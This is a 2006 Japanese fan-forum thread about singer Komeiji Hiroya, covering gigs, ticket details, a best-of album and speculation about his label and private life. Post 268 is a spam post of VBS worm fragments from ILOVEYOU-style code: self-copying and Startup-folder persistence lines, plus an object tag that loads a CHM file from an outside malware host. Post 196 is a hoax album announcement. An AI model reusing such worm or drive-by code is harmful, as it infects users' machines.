174 :NO MUSIC NO NAME:2006/02/10(金) 03:46:30 ID:xZTFomi/
最近ファンになりました。
この人最高だね。CDいっぱい出てるからコツコツ買って行くよ〜。

175 :NO MUSIC NO NAME:2006/02/11(土) 23:18:52 ID:JBB1UySL
山口洋のソロツアーの東北の3本にゲストで出るそうだ。

176 :NO MUSIC NO NAME:2006/02/14(火) 00:57:07 ID:4EihdonP
HPイイネ!

177 :NO MUSIC NO NAME:2006/02/14(火) 16:13:33 ID:9nbjZVYZ
コメイジー・スペーシー

178 :NO MUSIC NO NAME:2006/02/15(水) 19:46:36 ID:tdu8XPIt
エッグマンライブケテーイ!

179 :NO MUSIC NO NAME:2006/02/17(金) 12:50:15 ID:bhBAzyJ8
kwsk

180 :NO MUSIC NO NAME:2006/02/18(土) 06:41:35 ID:37+wHZ5C
wktk

181 :NO MUSIC NO NAME:2006/02/21(火) 19:08:48 ID:40v/gnTo
shibuya eggman presents shibuya eggman 25th anniversary“We Didn't Start The Fire”
【日時】3月30日(木) 18:30open / 19:00start
【出演】CORNER、惑星、detroit7、古明地洋哉
【チケット】adv \2,500 door \3,000(w/o drink) 発売中
      eggman店頭 / ローソンチケット:Lコード 32631 / チケットぴあ:Pコード 223-744
【問】shibuya eggman:03-3496-1561
【HP予約】お名前・枚数・ご連絡先を明記の上、info@komeiji-hiroya.netまでメールください。

182 :NO MUSIC NO NAME:2006/02/24(金) 14:16:59 ID:Au/uuStB
rtsf

183 :NO MUSIC NO NAME:2006/02/24(金) 17:25:08 ID:xjIeomHZ
↑なにこれ?

184 :NO MUSIC NO NAME:2006/02/27(月) 16:38:08 ID:IX6FNGiM
あれ、いつの間にコメプーからコメ先輩になったんだろうか。

185 :NO MUSIC NO NAME:2006/03/01(水) 04:30:58 ID:mE5sMzVZ
誰かエッグマン行く人いる?久々だから見たい気もするんだけど
メンツがな・・・

186 :NO MUSIC NO NAME:2006/03/02(木) 09:17:57 ID:0h0VLuki
メンツ悪くないんじゃない?
私は行きます。ノシ

187 :NO MUSIC NO NAME:2006/03/11(土) 01:09:06 ID:WbD+Mvk0
HPのBGMいいね。早く新曲が出ないかなー

188 :NO MUSIC NO NAME:2006/03/16(木) 16:55:16 ID:YAtJJlbs
たぶんレコード会社の契約切れてるんじゃね?
だからリリースが無いのではないかと。

189 :NO MUSIC NO NAME:2006/03/19(日) 10:12:16 ID:diAMcUpi
もう今更とってくれる所なんて無いよな

190 :NO MUSIC NO NAME:2006/03/23(木) 22:54:56 ID:/ZseLSIF
悲しいなあ
レコード会社は悲しいなあ

191 :NO MUSIC NO NAME:2006/03/24(金) 00:41:37 ID:tA509Ic3
インディーズでもいーから地道にやってほしい。
また変てこなPV作られるよかマシ。

192 :NO MUSIC NO NAME:2006/03/24(金) 00:57:12 ID:rcUPmagJ
最近はライブも増えたし地道とおもう

193 :NO MUSIC NO NAME:2006/03/29(水) 12:01:45 ID:504XlQz8
アラバキケテーイ!

194 :NO MUSIC NO NAME:2006/03/30(木) 14:01:31 ID:0eaSm8u8
ライブage

195 :NO MUSIC NO NAME:2006/03/31(金) 02:06:42 ID:9bc29u7/
北のまほろばチームで出るんだね。明星くんも一緒でうれしいな。
個人的にはもう一押しあったら行きたいなあ。

196 :NO MUSIC NO NAME:2006/03/32(土) 03:35:36 ID:jXMZ9SdA
NEW!
■古明地洋哉、初のベストアルバム発売決定!

「untitled」
2006.5.24 release
COCP-50827 2800円(税込)

01. 欲望
02. Fuck You(God bless, please)
03. ghost
04. ライラックの庭(single version)
05. tonight
06. fairy tale
07. daydream
08. mind game 
09. 素晴らしい嘘
10. 君を見つけたよ
11. 想いが言葉に変わるとき(single version)
12. untitled #1(single version)
13. 夜の冒険者
14. 何もない
15. 世界の果て(new version)
16. 新曲(予定)

197 :NO MUSIC NO NAME:2006/04/02(日) 01:30:12 ID:ZUJBJkpC
ほしー^^

198 :NO MUSIC NO NAME:2006/04/02(日) 06:10:59 ID:991fkCl2
あらあらメジャーあぼーんか…

199 :NO MUSIC NO NAME:2006/04/03(月) 20:43:48 ID:OZtRsxRD
ていうか日付…
釣りだわよ

200 :NO MUSIC NO NAME:2006/04/04(火) 02:24:58 ID:OY+TbvZX
目欄に書いてあるし

201 :NO MUSIC NO NAME:2006/04/07(金) 21:38:56 ID:tkk6NF7Q
きれいなひととsigur ros見に来てた。元気そうだった

202 :NO MUSIC NO NAME:2006/04/08(土) 01:17:39 ID:EcLqew6p
アラバキ行きたかったんだけど、時間帯がなー・・・。
せめて29日だったら良かったのに。エゾにはでないかな?

203 :NO MUSIC NO NAME:2006/04/11(火) 00:10:22 ID:0P54bLq9
そーいや今更だが、30日のライブどーだったん??


204 :NO MUSIC NO NAME:2006/04/12(水) 18:24:42 ID:2utrqiNp
ヨカッタ&泣イタ
v(^_^)v(^_^)v(^_^)v(^_^)vv(^_^)v(^_^)v(^_^)v

205 :NO MUSIC NO NAME:2006/04/13(木) 01:17:57 ID:xSeCspxE
確かによかった。一曲目って新曲だよね?曲名何ていうんだろ。確かエッグマンでもやってたような。

206 :NO MUSIC NO NAME:2006/04/13(木) 01:38:01 ID:xSeCspxE
サゲ忘れた…OTL

207 :NO MUSIC NO NAME:2006/04/14(金) 14:33:01 ID:FY1uqGTj
>205
>01. unknown voices

208 :NO MUSIC NO NAME:2006/04/14(金) 23:58:06 ID:S8nMralS
>>207
サンキューです

209 :NO MUSIC NO NAME:2006/04/20(木) 00:07:22 ID:286xU054
9日のライブ行ってないの?
楽しかったよ〜

210 :NO MUSIC NO NAME:2006/04/21(金) 03:05:22 ID:44el9o6Q
このスレの住人ってライブ行かない人多い?

211 :NO MUSIC NO NAME:2006/04/22(土) 22:07:40 ID:Eeaci3wT
>>210
繋がれない人たちw

212 :NO MUSIC NO NAME:2006/04/23(日) 03:52:42 ID:SvAndKs/
↑言いえて妙。
でももったいないよね。
最近のコメプー、ライヴめちゃくちゃイイのに。

213 :NO MUSIC NO NAME:2006/04/23(日) 21:17:04 ID:q6E2aViv
近くに来てくれたら行くけど
近くに来ないのでまだ1回しか見たことない

214 :NO MUSIC NO NAME:2006/04/25(火) 15:43:25 ID:n14ZUwc1
くらい…

215 :NO MUSIC NO NAME:2006/04/25(火) 22:30:30 ID:dmDzD/Oe
ついに今週末です。良かったらアラバキスレにもどうぞ。

【荒吐】ARABAKI ROCK FEST. part4【みちのく】
ttp://music5.2ch.net/test/read.cgi/musicj/1143882656/

聴いたことないけど、見てみたいな。分からないけど、セッションみたいな感じになるのかな。

216 :NO MUSIC NO NAME:2006/04/27(木) 01:31:41 ID:aZKsq59h
>>214
たしかに。でもあの暗さは気持ちいい。

>>215
ツアーの時みたく三組それぞれやって最後にセッションじゃないかなぁ。わかんないけど。
観に行けないんでレポしてもらえたら嬉しいです。

217 :NO MUSIC NO NAME:2006/05/02(火) 22:01:04 ID:sLePluP9
誰もARABAKI行ってないみたいだな

218 :富田派:2006/05/03(水) 13:41:04 ID:ecGhAo2S
この人、いい曲とそうじゃない曲の差が激しい

219 :NO MUSIC NO NAME:2006/05/04(木) 19:57:06 ID:y8t+FO/+
a

220 :NO MUSIC NO NAME:2006/05/04(木) 22:14:57 ID:IUomDFK/
>>218どの曲が「良くない曲」なのか教えて

221 :NO MUSIC NO NAME:2006/05/05(金) 02:14:09 ID:mmx0arMD
アラバキ行った人いないの??
 

222 :NO MUSIC NO NAME:2006/05/10(水) 04:13:38 ID:yLPTHpth
>>220
富田派はスルーするがよろし。

223 :NO MUSIC NO NAME:2006/05/11(木) 12:11:25 ID:uZIpiqRl
■6月のライブ情報
 ★6月4日(日) 下北沢GARAGE GLASSWONDER presents“Love Fool vol.1”
  17:30open / 18:00start adv\2,000 / door\2,200(w/o drink)
  w/ GLASSWONDER / cheese
  【チケット発売】4月23日(日)ローソンチケット L=39173
 ★6月7日(水) 渋谷7thFLOOR ash-ray主催“右ねじり左ねじり”
  18:30open / 19:30start adv\2,500 / door\2,800(w/o drink)
  w/ ash-ray(清水ひろたか・名越由貴夫・あらきゆうこ)/ 平岡恵子 / DJ hb

■札幌・旭川ライブ決定!古明地がリスペクトするSIONさんとの共演!
 ★SMASH EAST企画ライブイベント“EAST GO AROUND VOL.5”
  5月19日(金) 札幌・アイビック(札幌市中央区南4条西4丁目恵愛ビル4F)
   19:00open / 19:30start \5,000
   w/ SION with Bun Matsuda / 長谷川幸裕(BUMBLE BEE)
 ★SION アコースティックLive2006〜SION with Bun Matsuda〜
  5月20日(土) 旭川・CASINO DRIVE(旭川市4条通15丁目銀座ストアー2F)
   18:30open / 19:00start \5,000
 【チケット発売】ローソンチケット L=17363 / チケットぴあ P=226-310
         ※札幌公演のみTOWER RECORDS札幌PIVOT店でもチケット取り扱い
 【問い合わせ】 SMASH EAST:011-261-5569

224 :NO MUSIC NO NAME:2006/05/15(月) 16:51:04 ID:DRW0vAA7
しずかだな

225 :NO MUSIC NO NAME:2006/05/17(水) 16:47:45 ID:9oocWDXr
古明地洋哉が近くを歩いてても恐らく気付かない。

226 :NO MUSIC NO NAME:2006/05/21(日) 00:46:09 ID:PYJqhZOD
隣で立ち読みしてても気づかないかもなW

227 :NO MUSIC NO NAME:2006/05/21(日) 21:05:37 ID:HFE1Zlpc
You Tubeでも一個しかないしね

228 :NO MUSIC NO NAME:2006/05/23(火) 01:01:12 ID:yKYY0lAU
>>225>>226
レコ屋と本屋で見たことあるよ。
でもメチャクチャ真剣に物色してたから声かけられなかった…orz

229 :NO MUSIC NO NAME:2006/05/24(水) 20:05:18 ID:PHMLO88T
>>227
夜の冒険者のPV今見てました。着ぐるみが謎です。

>>228
田舎だからそういう事が無いので羨ましいです。
でも自分は近くに居ても似てるな〜くらいにしか感じないでしょうが(笑)

230 :NO MUSIC NO NAME:2006/05/26(金) 01:00:03 ID:90ztVNoH
>>228>>229
インストアライブの後にCD物色してるの見た。
ホントに音楽好きなんだなぁと思った。
日記で色んなミュージシャンについて熱く書いてるのも頷けるって感じ。

231 :NO MUSIC NO NAME:2006/05/29(月) 16:18:58 ID:p0F+xJjf
明星のライブに来てたよ

232 :NO MUSIC NO NAME:2006/05/30(火) 00:27:05 ID:8lfFEYFi
六月のライブは「ぴあ」とかでもチケット取れるんですか?

233 :NO MUSIC NO NAME:2006/06/02(金) 13:51:32 ID:QxVFRxMG
ハナウタウタウ

234 :NO MUSIC NO NAME:2006/06/02(金) 21:26:15 ID:ARcdopeC
ハナウタ、リリースして欲しいね
って言っても最近ライブ行ってないから
公式で流れてるののどれがハナウタなのかわからない

235 :富田派:2006/06/03(土) 12:24:50 ID:x0qdoi+l
タイトル忘れちゃったんですけど、この人の曲で「I'ts not up to you」ってフレーズが繰り返すやつありますよね?

こないだ聴いたビョークの曲がこれとすごく似てた・・・

236 :NO MUSIC NO NAME:2006/06/05(月) 21:00:44 ID:evNgnzGh
初めて見ました☆かっこよかったーーーー(*^_^*)

237 :NO MUSIC NO NAME:2006/06/06(火) 01:44:47 ID:rocWpSYJ
俺も昨日のライブ見ました!ギターがトラブってたけど、そんなのどうでもいいくらい良かった!
見るたびに歌が前に出てきてる気がする。

238 :NO MUSIC NO NAME:2006/06/06(火) 04:01:28 ID:t3IIREzf
でもやっぱバイオリンを加えたバンドでの古明地が聴きたいなぁって思わされたライブだった

239 :NO MUSIC NO NAME:2006/06/07(水) 17:47:35 ID:/A8DwgiJ
こいつ何の価値があんの?
こいつの陰気なだけでまったく面白くないCD
ゴミ捨て場に捨てたよおれw

240 :NO MUSIC NO NAME:2006/06/07(水) 23:56:21 ID:EyekQX0L
次のライブいつ?三人編成の方がいいよねー。

241 :NO MUSIC NO NAME:2006/06/08(木) 00:11:18 ID:4YuZAwFX
私はCD大事にしてます。

242 :NO MUSIC NO NAME:2006/06/08(木) 01:22:27 ID:+kM4AdlI
>>239
キレてる?w

243 :NO MUSIC NO NAME:2006/06/08(木) 01:34:58 ID:5vdnZdlD
>>239
聴いて何を感じるかは人それぞれでしょ。
俺は無意味に明るいだけの音楽の方がよっぽどゴミだと思うけどね。

244 :NO MUSIC NO NAME:2006/06/08(木) 18:56:39 ID:CywZ5JCg
>>239
どのCDを聞いてゴミだと思ったのか聞きたいです
買うか迷っているのがあるので参考にしたいです

245 :NO MUSIC NO NAME:2006/06/08(木) 19:44:19 ID:iaeQrUvI
陰気ではないな
ちゃんと希望がある音楽だろ

246 :NO MUSIC NO NAME:2006/06/08(木) 21:04:58 ID:m3GlRf4+
お前ら釣られすぎw

247 :富田派:2006/06/09(金) 01:09:58 ID:p9IIO/48
夜の蝶とビョークの「it's not up to you」が似てる


たぶん参考にしてるんだろうな。ビョークのヴェスパタインはこの人好きそうなアルバムだし。

248 :NO MUSIC NO NAME:2006/06/09(金) 04:19:35 ID:X0Z0JewG
「春の嵐」歌わないかな

249 :NO MUSIC NO NAME:2006/06/09(金) 12:40:44 ID:5vg0MtRQ
だって、ダミアンライズもよくパクってるじゃんW
正直、そういうのを聴くとちょっとがっかりしちゃうんだよね。いい歌多いのに。あんまやらんでほしい。

250 :NO MUSIC NO NAME:2006/06/10(土) 05:30:13 ID:lHIyj16N
>>249
自分のものに出来てればパクってようがなんだろうがどーでもいい。
今日のライブ見たけど、今のコメさんの歌を生で聴かないのはもったいない。
あんな風に命を削りながら歌う人、他にいないよ。

251 :NO MUSIC NO NAME:2006/06/10(土) 16:38:57 ID:7oSooMSL
>>250
昨日のライブ本当に行きたかった。よかったらセットリストを教えてください。
やっぱり一人、アコギですか?

252 :NO MUSIC NO NAME:2006/06/11(日) 19:22:49 ID:AG6kaKqE
>>251
オヒにうpされてる

253 :NO MUSIC NO NAME:2006/06/11(日) 20:22:24 ID:wiLpoYSh
>>251
弾き語りでしたよ。出演者全員でビートルズとはっぴいえんどをセッションしてました。あと吉村さんの曲でギター弾いてました。変なフレーズ弾いてて何か面白かった(笑。

9日のライブ見て改めて思ったけど、出演した四組の中ではコメさん異質だなぁって。他の人たちとはテンションの質が違う感じ。良い意味で浮いてた。
バンドライブが見れないのは残念だけど、ギター一本の弾き語りでもちゃんといびつな存在でい続けてくれているのは嬉しい。

長文スマソ。

254 :NO MUSIC NO NAME:2006/06/12(月) 04:03:08 ID:O5BQx3H7
>>253
長文ありがとうございます。
ちなみにfuck you(makes me green)って何ですか?サブタイがアクロバットと同じ・・・

255 :NO MUSIC NO NAME:2006/06/17(土) 17:44:55 ID:IzCMXGSY
ほしゅ

256 :NO MUSIC NO NAME:2006/06/18(日) 02:50:50 ID:V6j2ZsxJ
コメログトマッテルネ…

257 :NO MUSIC NO NAME:2006/06/20(火) 02:01:30 ID:wq5eLzi8
関係ない話だけど、何か悲しい気持ちになると、余計に聞きたくなるんだよね。
大体はdaydreamなんだけど、今は灰と花(アルバム)なんだよな。そういうのってない?違ってたらスマソ

258 :NO MUSIC NO NAME:2006/06/20(火) 17:22:51 ID:QPAK0gpe
心身がだるい時はキャッチーさがあまり無くて、ドラムの存在が薄い曲が聞きたくなる。

259 :NO MUSIC NO NAME:2006/06/20(火) 18:11:42 ID:npc2DKaf
アコースティックなアルバムを作ってほしいなぁ。

独り言スマソ。

260 :NO MUSIC NO NAME:2006/06/21(水) 22:46:46 ID:hK/UG/vh
>>257
俺は最近は「孤独の音楽」モード。あの重さがたまらん。

>>258
落ちてる時は「クロエ」か「讃美歌」をひたすら聴き続ける。本気で布団から出れなくなるよ(笑。

>>259
賛成。全曲「daydream」みたいなアルバム聴きたいなぁ…。





売れないか…orz

261 :NO MUSIC NO NAME:2006/06/23(金) 03:52:17 ID:D2MgJPzm
コメログマダトマッテルネ…。

262 :NO MUSIC NO NAME:2006/06/27(火) 11:58:52 ID:gdds8S3M
ジャケットのイラストかいてる矢野さんて


こめさんの彼女?

263 :NO MUSIC NO NAME:2006/06/28(水) 02:49:17 ID:KFJuC/6U
>>262
前にカキコされてたけどシガーロスのライブ会場で綺麗な女の人と一緒にいるのを俺も見た。
でも絵を描きそうな感じの人じゃなかった…って答になってないね。スマソ。

264 :NO MUSIC NO NAME:2006/06/28(水) 04:15:36 ID:sOoFInpy
こないだ山口洋ライブにモデルみたいな人と一緒だったけど絵を描きそうな感じかどうかまではわからないです

265 :NO MUSIC NO NAME:2006/06/28(水) 16:37:26 ID:5V5QUJuW
>>263
シガロスの人はコメログに書いてある
中川正子さんて
写真家さんみたいだよ。
この人のブログにも書いてあったよ。

266 :NO MUSIC NO NAME:2006/06/29(木) 00:26:07 ID:0nlRgbUo
>>264
それ、ジャーマネさんだよ(笑。

コメさんの周りには美人さんが多いのかな。羨ましいなぁ…。

267 :NO MUSIC NO NAME:2006/06/30(金) 00:48:17 ID:KWMqWpiR
一時期よく下北のライブハウスで見かけたけど、連れがいるところは見たことないな。
いつも一人でお酒飲みながらユラユラ揺れてて、あーこの人も踊るんだなぁと思ったよw

268 :NO MUSIC NO NAME:2006/07/02(日) 20:33:34 ID:nE3yw/VP
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

269 :NO MUSIC NO NAME:2006/07/02(日) 23:32:07 ID:H0cm0ota
↑やめなさいな

270 :NO MUSIC NO NAME:2006/07/05(水) 23:34:27 ID:K8sLDan8
以前のライブで矢野さんの絵の展示も一緒にやっていて
そのときのコメさんとの雰囲気がよかったから、つきあってるんだと思ってました。
夜の冒険者の女の人に似てる雰囲気だったし。

271 :NO MUSIC NO NAME:2006/07/06(木) 00:21:48 ID:8f5aHQaV
コメイジのまわりにだって女の人はたくさんいるんだし、みんなを彼女じゃないかって言ってたらキリないよ。

272 :NO MUSIC NO NAME:2006/07/07(金) 03:03:01 ID:Oj3Ific9
「エンドレス・ワルツ」っていう曲を聴いたことある人いますか?
五月の札幌ライブでやったらしいんですが、見に行った友人が言うには「死にたくなるくらい暗くて綺麗な曲」だそうです。
東京のライブではやってないんでしょうか?

273 :NO MUSIC NO NAME:2006/07/08(土) 02:36:01 ID:Ohg62GV/
>272
Set Listは公式のLive Scheduleのとこで見れるよ
5/19の札幌と5/20の旭川でしかやってないみたいだね



企画ってなんでしょう?

274 :NO MUSIC NO NAME:2006/07/08(土) 17:48:21 ID:AAemP4JK
>>273
レスありがとう。早速チェックしてみたけど北海道でしかやってないみたいですね。
ブリティッシュフォークっぽい暗めの曲で、「daydream」に雰囲気が近いらしいから聴いてみたいんですよね。
東京でやってくれないかなぁ…。

275 :NO MUSIC NO NAME:2006/07/10(月) 01:05:28 ID:DLSuOM5G
ライヌ行ったヤシいない

276 :NO MUSIC NO NAME:2006/07/11(火) 02:25:54 ID:+db/TbFN
七日のライブ行きました。
ハナウタとラッキー・スター以外は全部新曲でしたよ。ライブ見に行くたびに新曲が聞けるから嬉しい。創作意欲衰えずって感じで頼もしいです。
早く新しいアルバム聞きたいですね。

277 :NO MUSIC NO NAME:2006/07/14(金) 03:09:31 ID:3vWi1/Jv
祝・企画ライブage

278 :NO MUSIC NO NAME:2006/07/15(土) 16:11:45 ID:hS/lVEPe
企画ライブ!しかも近藤さんとのツーマンか!長めのライブ久しぶりだから嬉しいなー!

279 :NO MUSIC NO NAME:2006/07/16(日) 01:15:42 ID:1oNh81Pa
>>278
誘われたイベントに出るみたいな感じだったから、長めのライブは久しぶりだよね。
新曲も聴きたいけど、昔の曲もやって欲しいな。「こころ」とか「欲望」とかを今のコメさんが歌ったらどんな感じになるんだろうって思う。

280 :NO MUSIC NO NAME:2006/07/18(火) 23:46:53 ID:Azqa0ptw
月見ル君想フ、行ったことないけど良い感じのライブハウスみたいですね。
讃美歌1から新曲まで歌いたい曲がたくさんあるってブログに書いてあったから楽しみです!

イベント期待大なのでage!

281 :NO MUSIC NO NAME:2006/07/21(金) 01:01:30 ID:OPh9+a8o
8月21日はやっぱり弾き語りなんだろーか?

282 :NO MUSIC NO NAME:2006/07/24(月) 17:44:24 ID:AUbmwtuP
PEALOUT近藤ソロに飛び入りしたらしいね>ブログ

283 :NO MUSIC NO NAME:2006/07/25(火) 00:03:50 ID:7PW6S5ij
ここにいる人はコメイジ以外の日本人ミュージシャン誰を聞いてますか?

284 :NO MUSIC NO NAME:2006/07/31(月) 16:04:26 ID:ZyzH+Fbj
ヒ・ミ・ツ

285 :NO MUSIC NO NAME:2006/08/04(金) 15:32:41 ID:MYeXxtM/
srup16gのライブに来てたって。
明日440だね。

286 :285:2006/08/07(月) 11:22:44 ID:vIAbYLWu
誰も行ってないんだね。
みんなライブ行かないのね。

287 :NO MUSIC NO NAME:2006/08/14(月) 16:32:43 ID:AlxuHqr2
>>283
モーサム、ACIDMAN、シロップ、ベンジー、チバ、エレカシ、
明星、くるり、バイン、曽我部、ピールアウト、東京事変

288 :NO MUSIC NO NAME:2006/08/14(月) 20:09:13 ID:3VGnyGbh
>>283
椎名林檎、東京事変、Love Psychedelico、笹川美和、Advantage Lucy

バンド系よりシンガーソングライター系の方が好きになりやすい。
日本の男性で聴いているのは古明地洋哉一人だけ。自分の中で特別な存在。

289 :NO MUSIC NO NAME:2006/08/19(土) 23:27:06 ID:Ni/CTl8V
ライブですよ!

290 :NO MUSIC NO NAME:2006/08/22(火) 12:15:14 ID:eckQaGSV
誰かレポplz

291 :NO MUSIC NO NAME:2006/08/22(火) 21:40:49 ID:LXM+qzPn
SET LISTならもう公式に出てる
ライブタイトルがENDLESS WALTZなのにendless waltzはやってないのね

292 :NO MUSIC NO NAME:2006/08/25(金) 01:21:28 ID:uGS8YxG3
今回行けなかったから9月のは行きたいなぁ…
しかし新参なので昔の曲はまだあんまり知らない罠

293 :NO MUSIC NO NAME:2006/08/27(日) 04:38:47 ID:S6YtezJ8
>>292
昔の曲、知らなくても新しい曲として聴くことができるって
ライブの良いところじゃないですか。生で試聴できるみたいな。

>>290
ライブ、素晴らしかったです。
アコギ一本であれだけ厚みのあるサウンドと声の魅力が圧巻で
満員なんだけどリラックスできるライブハウスの中で充分楽しみました。
近藤智洋さんとのコンビは自分たちも言っていたけれど恋人同士みたい。
セッションの最後にやった「ムーンリバー」、ふたりが歌うとこんな風になるんだなぁと
週の初めの月曜日に良い気持ちになって帰ることができました。
個人的には「bleach」が聴けたのがすごく嬉しかったです。

294 :NO MUSIC NO NAME:2006/08/28(月) 02:54:57 ID:vVJw7c1K
>>293
そうですね。張り切って行けるようにします(`・ω・´)

295 :NO MUSIC NO NAME:2006/08/29(火) 21:17:54 ID:jERiSVpK
>>293
俺は毛皮のマリーにヤラれました。まさかアコギ一本であの曲やるとは思わなかった!
CDで聴くのとは違う興奮を味わえるのがライブの楽しさですよね。来月も見に行かなきゃ!

296 :NO MUSIC NO NAME:2006/08/31(木) 16:26:25 ID:glLM9gtA
ライブ行けないから
また事務所のレーベルからライブCDでも出してほしい

297 :NO MUSIC NO NAME:2006/09/11(月) 22:54:11 ID:ulI79yML
チケット売り切れ
明星効果か(-_-#)

298 :NO MUSIC NO NAME:2006/09/15(金) 14:57:58 ID:6PDPmvse
ほんとにさ…
どんなちっさいレーベルでも良いからCD出して欲しいなぁ

299 :NO MUSIC NO NAME:2006/09/16(土) 16:47:01 ID:4Px7TTzu
何もないってただただ素晴らしい曲だな

300 :NO MUSIC NO NAME:2006/09/18(月) 14:49:20 ID:zxxsQLmM
誰?

301 :NO MUSIC NO NAME:2006/09/20(水) 17:02:33 ID:CGfgL8+4
コロムビアじゃないの?

302 :NO MUSIC NO NAME:2006/09/20(水) 23:44:31 ID:P0tgJbWf
>>300
「何もない」はラジオで一度だけ流れたコメ氏の未発表曲。








なぜあの曲をリリースしない?大人の事情なのか?

303 :NO MUSIC NO NAME:2006/09/21(木) 15:16:47 ID:EHwv2hO8
>302
曲の版権はコロムビアが持ってるだろう
あの時流れたの他のアーティストはライブ音源だったけど
モーサムと古明地だけレコーディング音源だった
モーサム流させてやるから、首切ったのでこのままお蔵入りに
なるだろう古明地のも流してくれということだと思う

304 :NO MUSIC NO NAME:2006/09/21(木) 23:13:59 ID:slS7XQ2P
>>303
関係者?ww
コメイジ首切られたの?
首切ったのならお蔵入り音源流しても仕方ないじゃん。
ラジオで一回くらい流したってモト取れないだろうし何のメリットが?

あの番組はデビュー時からコメイジ応援してたよ。
「mind game」激押しだったじゃん。

305 :NO MUSIC NO NAME:2006/09/22(金) 01:06:13 ID:ZCp/KHhp
ところで明日ライブだね

306 :NO MUSIC NO NAME:2006/09/22(金) 12:35:20 ID:SujubXFe
>>303
曲の権利もってんのは事務所だと思う
あそこはそういうのしっかりしてる

307 :NO MUSIC NO NAME:2006/09/22(金) 17:21:31 ID:rITRppLS
モーサムなんかよりよっぽど良いのにな

308 :NO MUSIC NO NAME:2006/09/22(金) 21:06:19 ID:p6cuUMDv
こいつ誰? 

309 :NO MUSIC NO NAME:2006/09/25(月) 10:52:34 ID:9+DCMbG+
>>308
www.komeiji-hiroya.net
ここ見りゃわかるだろ

310 :NO MUSIC NO NAME:2006/09/25(月) 13:07:59 ID:Sq4z5Q1w
コロムビアから首切られたんだ…しらんかった…

311 :NO MUSIC NO NAME:2006/09/26(火) 09:09:03 ID:jAT8/6aM
マネが変わってコメイジよくないね。
この様はそれが原因なんじゃ・・・

312 :NO MUSIC NO NAME:2006/09/26(火) 10:24:46 ID:CZ1Aov4D
前回、前々回と行けなかったから、10月のは行きたいぞ…
CDも…出して欲しいなぁ…

313 :NO MUSIC NO NAME:2006/09/26(火) 10:38:17 ID:CZ1Aov4D
あ…間違えた。11月だ。

314 :NO MUSIC NO NAME:2006/09/26(火) 16:24:10 ID:BPNJEq+t
青マネがいたころは
CDもいっぱい出してたしテレビにも出まくってたしHPもおもしろかったし良かったよ。
古明地も有能なブレーンを失ったのが運のツキだったってことか。

315 :NO MUSIC NO NAME:2006/09/26(火) 18:00:36 ID:JsYFmMqF
今更だが改装してからのサイトは最高に見づらい。
…というか強制で音が流れる&止める手段がないのがちょっと…
試聴関係も前の方が見やすいしサービス精神に溢れてた。

316 :NO MUSIC NO NAME:2006/09/27(水) 01:19:43 ID:g5i8Wgm4
マネージャー変わればいいのになぁ


317 :NO MUSIC NO NAME:2006/10/01(日) 14:56:31 ID:EpxpVovv
公式見づらいですよね。
私も強制で音楽流れるのにちょっと迷惑してます。
冥王星がどうのこうの言う前に、そういうことを考えれば…。

318 :NO MUSIC NO NAME:2006/10/01(日) 23:42:28 ID:itRrPCbV
マネージャーがどうのこうのっていうのがよくワカラン
詳細plz

319 :NO MUSIC NO NAME:2006/10/08(日) 15:56:06 ID:N/9dLeR2
保守

320 :NO MUSIC NO NAME:2006/10/11(水) 00:17:55 ID:GF07WHcO
公式で流れる、「君の声 それだけで僕はただ〜」
って曲のタイトルは何ですか?

この人のこと全然知らないけど、虜になりそう

321 :NO MUSIC NO NAME:2006/10/11(水) 00:22:40 ID:FbEd0D3h
ベストアルバムが
ジャンクで100円で売ってから
なんとなくジャケ買いしたけど
なかなか良い歌手だな


322 :NO MUSIC NO NAME:2006/10/13(金) 00:38:41 ID:G1WgQ8x3
ジャケ買いするようなアルバムって何ですか?

323 :NO MUSIC NO NAME:2006/10/15(日) 10:54:36 ID:4i0/0ka9
アコギオーダーするような稼ぎがまだあるんだねぇ

324 :NO MUSIC NO NAME:2006/10/16(月) 01:39:05 ID:NPi6fvrA
コメイジがこの先売れることは、まずないと思うのは俺だけか?

325 :NO MUSIC NO NAME:2006/10/16(月) 21:48:19 ID:hspcjnSb
想いが言葉に変わるときは売れていいはずの曲だったしね。

326 :NO MUSIC NO NAME:2006/10/17(火) 17:11:25 ID:I2eBzHr/
売れたら不思議。

327 :NO MUSIC NO NAME:2006/10/18(水) 01:46:59 ID:WF6wQMFB
バンド古明地は久しぶりに聞きたい。

328 :NO MUSIC NO NAME:2006/10/27(金) 10:14:27 ID:Y7numuyL
最近どうしてるのかな?
久々にライブで聞きたいなぁ。

329 :NO MUSIC NO NAME:2006/10/27(金) 22:31:01 ID:KwnhjUEu
聞ける
ttp://www.aquamusic.co.jp/going/html/top/DUSTTRAIL6-1.html

330 :NO MUSIC NO NAME:2006/10/29(日) 23:53:45 ID:wUQVt8LA
>>328
ワンマンある

331 :NO MUSIC NO NAME:2006/10/30(月) 15:27:57 ID:uhxIRA/Y
今マン毛 汚れた毛で

332 :NO MUSIC NO NAME:2006/11/06(月) 17:49:01 ID:MAnMerY/
だれかあげろよ

333 :NO MUSIC NO NAME:2006/11/12(日) 20:34:56 ID:DGeGTvNQ
来週ワンマンage

334 :NO MUSIC NO NAME:2006/11/13(月) 01:46:27 ID:b6dWr+w2
久々のバンドage

335 :NO MUSIC NO NAME:2006/11/17(金) 16:22:23 ID:c5AMdrjI
トム・ウェイツみたいに3枚組みの新作出したりしないかなー

336 :NO MUSIC NO NAME:2006/11/18(土) 13:25:24 ID:mn17iVtd
マインドゲームみたいなミニアルバムをチョロチョロって出していって欲しい

337 :NO MUSIC NO NAME:2006/11/20(月) 22:47:13 ID:f47PI/6D
ライヴ良かった。

338 :NO MUSIC NO NAME:2006/11/22(水) 23:51:26 ID:vywGThCE
>>337
良かったらどんなんだったか教えて。
ライブあること知らなくて、仕事してたよ…

